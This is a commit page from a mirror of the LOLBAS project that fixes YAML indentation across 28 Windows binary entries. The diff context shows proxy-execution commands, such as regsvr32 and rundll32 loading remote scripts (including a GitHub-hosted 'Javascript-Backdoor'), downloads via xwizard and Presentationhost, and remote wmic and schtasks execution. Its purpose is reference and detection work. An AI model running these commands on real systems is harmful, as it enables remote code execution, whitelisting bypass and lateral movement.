public-mirrors/LOLBAS
1
0
Fork 0
mirror of https://github.com/LOLBAS-Project/LOLBAS synced 2024-12-29 00:08:11 +01:00
Code Issues Projects Releases Wiki Activity

Correct identation

Browse Source
This commit is contained in:
Hegusung 2024-10-13 17:57:36 +02:00
parent 6375a4a338
commit 75d04eaf72
28 changed files with 54 additions and 54 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
yml/OSBinaries/Presentationhost.yml
View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Tags:
- Execute: XBAP
- Execute: XBAP
- Command: Presentationhost.exe https://example.com/payload
Description: It will download a remote payload and place it in INetCache.
Usecase: Downloads payload from remote server

2
yml/OSBinaries/Provlaunch.yml
View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1218
OperatingSystem: Windows 10, Windows 11, Windows Server 2012, Windows Server 2016, Windows Server 2019, Windows Server 2022
Tags:
- Execute: CMD
- Execute: CMD
Full_Path:
- Path: c:\windows\system32\provlaunch.exe
Detection:

12
yml/OSBinaries/Regsvr32.yml
View File

@ -12,8 +12,8 @@ Commands:
MitreID: T1218.010
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: SCT
- Execute: Remote
- Execute: SCT
- Execute: Remote
- Command: regsvr32.exe /s /u /i:file.sct scrobj.dll
Description: Execute the specified local .SCT script with scrobj.dll.
Usecase: Execute code from scriptlet, bypass Application whitelisting
@ -22,7 +22,7 @@ Commands:
MitreID: T1218.010
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: SCT
- Execute: SCT
- Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
Description: Execute the specified remote .SCT script with scrobj.dll.
Usecase: Execute code from remote scriptlet, bypass Application whitelisting
@ -31,8 +31,8 @@ Commands:
MitreID: T1218.010
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: SCT
- Execute: Remote
- Execute: SCT
- Execute: Remote
- Command: regsvr32.exe /s /u /i:file.sct scrobj.dll
Description: Execute the specified local .SCT script with scrobj.dll.
Usecase: Execute code from scriptlet, bypass Application whitelisting
@ -41,7 +41,7 @@ Commands:
MitreID: T1218.010
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: SCT
- Execute: SCT
Full_Path:
- Path: C:\Windows\System32\regsvr32.exe
- Path: C:\Windows\SysWOW64\regsvr32.exe

8
yml/OSBinaries/Rundll32.yml
View File

@ -30,7 +30,7 @@ Commands:
MitreID: T1218.011
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: JScript
- Execute: JScript
- Command: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");
Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe.
Usecase: Proxy execution
@ -39,7 +39,7 @@ Commands:
MitreID: T1218.011
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: JScript
- Execute: JScript
- Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}
Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe and then kills the Rundll32.exe process that was started.
Usecase: Proxy execution
@ -48,7 +48,7 @@ Commands:
MitreID: T1218.011
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: JScript
- Execute: JScript
- Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test")
Description: Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script.
Usecase: Execute code from Internet
@ -57,7 +57,7 @@ Commands:
MitreID: T1218.011
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: JScript
- Execute: JScript
- Command: rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain
Description: Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS).
Usecase: Execute code from alternate data stream

2
yml/OSBinaries/Runexehelper.yml
View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1218
OperatingSystem: Windows 10, Windows 11, Windows Server 2012, Windows Server 2016, Windows Server 2019, Windows Server 2022
Tags:
- Execute: EXE
- Execute: EXE
Full_Path:
- Path: c:\windows\system32\runexehelper.exe
Detection:

2
yml/OSBinaries/Runonce.yml
View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: CMD
- Execute: CMD
Full_Path:
- Path: C:\Windows\System32\runonce.exe
- Path: C:\Windows\SysWOW64\runonce.exe

2
yml/OSBinaries/Runscripthelper.yml
View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Tags:
- Execute: Powershell
- Execute: Powershell
Full_Path:
- Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe
- Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe

4
yml/OSBinaries/Sc.yml
View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
- Execute: EXE
- Command: sc config <existing> binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" & sc start <existing>
Description: Modifies an existing service and executes the file stored in the ADS.
Usecase: Execute binary file hidden inside an alternate data stream
@ -21,7 +21,7 @@ Commands:
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
- Execute: EXE
Full_Path:
- Path: C:\Windows\System32\sc.exe
- Path: C:\Windows\SysWOW64\sc.exe

4
yml/OSBinaries/Schtasks.yml
View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1053.005
OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
- Execute: EXE
- Command: schtasks /create /s targetmachine /tn "MyTask" /tr c:\some\directory\notevil.exe /sc daily
Description: Create a scheduled task on a remote computer for persistence/lateral movement
Usecase: Create a remote task to run daily relative to the the time of creation
@ -21,7 +21,7 @@ Commands:
MitreID: T1053.005
OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
- Execute: EXE
Full_Path:
- Path: c:\windows\system32\schtasks.exe
- Path: c:\windows\syswow64\schtasks.exe

6
yml/OSBinaries/Scriptrunner.yml
View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1202
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
- Execute: EXE
- Command: ScriptRunner.exe -appvscript "\\fileserver\calc.cmd"
Description: Executes calc.cmd from remote server
Usecase: Execute binary through proxy binary from external server to evade defensive counter measures
@ -21,8 +21,8 @@ Commands:
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: Remote
- Execute: CMD
- Execute: Remote
- Execute: CMD
Full_Path:
- Path: C:\Windows\System32\scriptrunner.exe
- Path: C:\Windows\SysWOW64\scriptrunner.exe

2
yml/OSBinaries/Setres.yml
View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1218
OperatingSystem: Windows Server 2012, Windows Server 2016, Windows Server 2019, Windows Server 2022
Tags:
- Execute: EXE
- Execute: EXE
Full_Path:
- Path: c:\windows\system32\setres.exe
Detection:

4
yml/OSBinaries/SettingSyncHost.yml
View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1218
OperatingSystem: Windows 8, Windows 8.1, Windows 10
Tags:
- Execute: EXE
- Execute: EXE
- Command: SettingSyncHost -LoadAndRunDiagScriptNoCab anything
Description: Execute a batch script in the background (no window ever pops up) which can be subverted to running arbitrary programs by setting the current working directory to %TMP% and creating files such as reg.bat/reg.exe in that directory thereby causing them to execute instead of the ones in C:\Windows\System32.
Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism. Additionally, effectively act as a -WindowStyle Hidden option (as there is in PowerShell) for any arbitrary batch file.
@ -21,7 +21,7 @@ Commands:
MitreID: T1218
OperatingSystem: Windows 8, Windows 8.1, Windows 10
Tags:
- Execute: EXE
- Execute: EXE
Full_Path:
- Path: C:\Windows\System32\SettingSyncHost.exe
- Path: C:\Windows\SysWOW64\SettingSyncHost.exe

4
yml/OSBinaries/Ssh.yml
View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1202
OperatingSystem: Windows 10 1809, Windows Server 2019
Tags:
- Execute: EXE
- Execute: EXE
- Command: ssh -o ProxyCommand=calc.exe .
Description: Executes calc.exe from ssh.exe
Usecase: Performs execution of specified file, can be used as a defensive evasion.
@ -21,7 +21,7 @@ Commands:
MitreID: T1202
OperatingSystem: Windows 10
Tags:
- Execute: EXE
- Execute: EXE
Full_Path:
- Path: c:\windows\system32\OpenSSH\ssh.exe
Detection:

4
yml/OSBinaries/Stordiag.yml
View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1218
OperatingSystem: Windows 10
Tags:
- Execute: EXE
- Execute: EXE
- Command: stordiag.exe
Description: Once executed, Stordiag.exe will execute schtasks.exe and powershell.exe - if stordiag.exe is copied to a folder and an arbitrary executable is renamed to one of these names, stordiag.exe will execute it.
Usecase: Possible defence evasion purposes.
@ -21,7 +21,7 @@ Commands:
MitreID: T1218
OperatingSystem: Windows 11
Tags:
- Execute: EXE
- Execute: EXE
Full_Path:
- Path: c:\windows\system32\stordiag.exe
- Path: c:\windows\syswow64\stordiag.exe

2
yml/OSBinaries/Syncappvpublishingserver.yml
View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1218
OperatingSystem: Windows 10 1709, Windows 10 1703, Windows 10 1607
Tags:
- Execute: Powershell
- Execute: Powershell
Full_Path:
- Path: C:\Windows\System32\SyncAppvPublishingServer.exe
- Path: C:\Windows\SysWOW64\SyncAppvPublishingServer.exe

4
yml/OSBinaries/Ttdinject.yml
View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1127
OperatingSystem: Windows 10 2004 and above, Windows 11
Tags:
- Execute: EXE
- Execute: EXE
- Command: ttdinject.exe /ClientScenario TTDRecorder /ddload 0 /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /launch "C:/Windows/System32/calc.exe"
Description: Execute calc using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated.
Usecase: Spawn process using other binary
@ -21,7 +21,7 @@ Commands:
MitreID: T1127
OperatingSystem: Windows 10 1909 and below
Tags:
- Execute: EXE
- Execute: EXE
Full_Path:
- Path: C:\Windows\System32\ttdinject.exe
- Path: C:\Windows\Syswow64\ttdinject.exe

2
yml/OSBinaries/Tttracer.yml
View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1127
OperatingSystem: Windows 10 1809 and newer, Windows 11
Tags:
- Execute: EXE
- Execute: EXE
- Command: TTTracer.exe -dumpFull -attach pid
Description: Dumps process using tttracer.exe. Requires administrator privileges
Usecase: Dump process by PID

2
yml/OSBinaries/Unregmp2.yml
View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1202
OperatingSystem: Windows 10
Tags:
- Execute: EXE
- Execute: EXE
Full_Path:
- Path: C:\Windows\System32\unregmp2.exe
- Path: C:\Windows\SysWOW64\unregmp2.exe

2
yml/OSBinaries/Verclsid.yml
View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1218.012
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: DLL
- Execute: DLL
Full_Path:
- Path: C:\Windows\System32\verclsid.exe
- Path: C:\Windows\SysWOW64\verclsid.exe

2
yml/OSBinaries/Wab.yml
View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Execute: DLL
Full_Path:
- Path: C:\Program Files\Windows Mail\wab.exe
- Path: C:\Program Files (x86)\Windows Mail\wab.exe

4
yml/OSBinaries/Winget.yml
View File

@ -12,8 +12,8 @@ Commands:
MitreID: T1105
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: Remote
- Execute: EXE
- Execute: Remote
- Execute: EXE
- Command: winget.exe install --accept-package-agreements -s msstore [name or ID]
Description: 'Download and install any software from the Microsoft Store using its name or Store ID, even if the Microsoft Store App itself is blocked on the machine. For example, use "Sysinternals Suite" or `9p7knl5rwt25` for obtaining ProcDump, PsExec via the Sysinternals Suite. Note: a Microsoft account is required for this.'
Usecase: Download and install software from Microsoft Store, even if Microsoft Store App is blocked

2
yml/OSBinaries/Wlrmdr.yml
View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1202
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: EXE
- Execute: EXE
Full_Path:
- Path: c:\windows\system32\wlrmdr.exe
Code_Sample:

12
yml/OSBinaries/Wmic.yml
View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
- Execute: EXE
- Command: wmic.exe process call create calc
Description: Execute calc from wmic
Usecase: Execute binary from wmic to evade defensive counter measures
@ -21,7 +21,7 @@ Commands:
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
- Execute: EXE
- Command: wmic.exe /node:"192.168.0.1" process call create "evil.exe"
Description: Execute evil.exe on the remote system.
Usecase: Execute binary on a remote system
@ -30,8 +30,8 @@ Commands:
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
- Execute: Remote
- Execute: EXE
- Execute: Remote
- Command: wmic.exe process get brief /format:"https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl"
Description: Create a volume shadow copy of NTDS.dit that can be copied.
Usecase: Execute binary on remote system
@ -40,8 +40,8 @@ Commands:
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: XSL
- Execute: Remote
- Execute: XSL
- Execute: Remote
- Command: wmic.exe process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl"
Description: Executes JScript or VBScript embedded in the target remote XSL stylsheet.
Usecase: Execute script from remote system

2
yml/OSBinaries/WorkFolders.yml
View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1218
OperatingSystem: Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
- Execute: EXE
Full_Path:
- Path: C:\Windows\System32\WorkFolders.exe
Detection:

4
yml/OSBinaries/Xwizard.yml
View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Execute: DLL
- Command: xwizard RunWizard /taero /u {00000001-0000-0000-0000-0000FEEDACDC}
Description: Xwizard.exe running a custom class that has been added to the registry. The /t and /u switch prevent an error message in later Windows 10 builds.
Usecase: Run a com object created in registry to evade defensive counter measures
@ -21,7 +21,7 @@ Commands:
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Execute: DLL
- Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM
Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file, and save it to INetCache.
Usecase: Download file from Internet

2
yml/OSBinaries/msedge_proxy.yml
View File

@ -28,7 +28,7 @@ Commands:
MitreID: T1218.015
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: CMD
- Execute: CMD
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/e1a713d264ac072bb76b5c4e5f41315a015d3f41/rules/windows/process_creation/proc_creation_win_susp_electron_execution_proxy.yml
Acknowledgement:

8
yml/OSBinaries/msedgewebview2.yml
View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1218.015
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: EXE
- Execute: EXE
- Command: msedgewebview2.exe --utility-cmd-prefix="calc.exe"
Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess.
Usecase: Proxy execution of binary
@ -21,7 +21,7 @@ Commands:
MitreID: T1218.015
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: EXE
- Execute: EXE
- Command: msedgewebview2.exe --disable-gpu-sandbox --gpu-launcher="calc.exe"
Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess.
Usecase: Proxy execution of binary
@ -30,7 +30,7 @@ Commands:
MitreID: T1218.015
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: EXE
- Execute: EXE
- Command: msedgewebview2.exe --no-sandbox --renderer-cmd-prefix="calc.exe"
Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess.
Usecase: Proxy execution of binary
@ -39,7 +39,7 @@ Commands:
MitreID: T1218.015
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: EXE
- Execute: EXE
Full_Path:
- Path: C:\Program Files (x86)\Microsoft\Edge\Application\114.0.1823.43\msedgewebview2.exe
Detection:

2
yml/OSBinaries/wt.yml
View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1202
OperatingSystem: Windows 11
Tags:
- Execute: EXE
- Execute: EXE
Full_Path:
- Path: C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_<version_packageid>\wt.exe
Detection: